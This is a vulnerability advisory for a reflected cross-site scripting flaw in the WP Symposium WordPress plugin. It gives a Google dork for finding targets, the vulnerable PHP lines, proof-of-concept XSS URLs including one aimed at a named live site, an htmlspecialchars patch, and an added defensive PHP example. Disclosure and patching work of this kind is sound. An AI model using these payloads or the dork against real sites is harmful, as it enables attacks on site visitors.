WordPress WP Symposium Plugin Cross Site Scripting

2015.09.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################
# Exploit Title : WordPress WP Symposium Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Google Dork: inurl:"/wp-content/plugins/wp-symposium/"
# Vendor Homepage : https://wordpress.org/plugins/wp-symposium/
# Date: 2015-09-02
# Tested On : Elementary Os - Firefox
# Software Link : https://downloads.wordpress.org/plugin/wp-symposium.15.8.1.zip
# Version : 15.8
######################
# Vulnerable Code:
# File: get_album_item.php - Line 5,12
5: $size = $_REQUEST['size'];
12: echo 'incorrect size: '.$size;
######################
# POC :
http://[URL]/[PATH]/wp-content/plugins/wp-symposium/get_album_item.php?size=<script>alert(/xss/)</script>
######################
# Live Target :
http://www.wpsyXmposium.com/wp-content/plugins/wp-symposium/get_album_item.php?size="><img src='x' onerror=alert(/xss/)>
######################
# Patch:
# File: get_album_item.php - Line 12
12: echo 'incorrect size: '.htmlspecialchars($size);
######################
# Discovered By : Ehsan Hosseini
######################
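
The patch above, extended into a standalone sketch; this is an added example, not the plugin's code. It sets the encoding flags and charset explicitly and rejects non-string input. The function names and the ALLOWED_SIZES list are hypothetical, since the advisory does not say which sizes the plugin accepts.

```php
<?php
// Added example, not the plugin's code. Encodes the rejected value for an
// HTML text context instead of echoing $_REQUEST['size'] verbatim.

// Hypothetical allow-list: the advisory does not list the accepted sizes.
const ALLOWED_SIZES = ['thumb', 'medium', 'full'];

function size_error_message(string $size): string
{
    // ENT_QUOTES also encodes single quotes (the default only since PHP 8.1);
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $safe = htmlspecialchars($size, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return 'incorrect size: ' . $safe;
}

function handle_size($raw): ?string
{
    // ?size[]=x makes $_REQUEST['size'] an array; treat non-strings as empty.
    $size = is_string($raw) ? $raw : '';
    if (in_array($size, ALLOWED_SIZES, true)) {
        return null; // valid size, no error message to render
    }
    return size_error_message($size);
}

// Constructed inputs: the two payload strings quoted in the advisory,
// an array value, and one value from the hypothetical allow-list.
$samples = [
    '<script>alert(/xss/)</script>',
    "\"><img src='x' onerror=alert(/xss/)>",
    ['array-input'],
    'medium',
];

foreach ($samples as $raw) {
    $msg = handle_size($raw);
    // Markup characters come out as entities (&lt; &gt; &quot; &#039;).
    echo ($msg ?? 'ok'), PHP_EOL;
}
```

Run from the CLI, the two payload strings print with their angle brackets and quotes as entities, so a browser would display them as text rather than parse them as markup.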

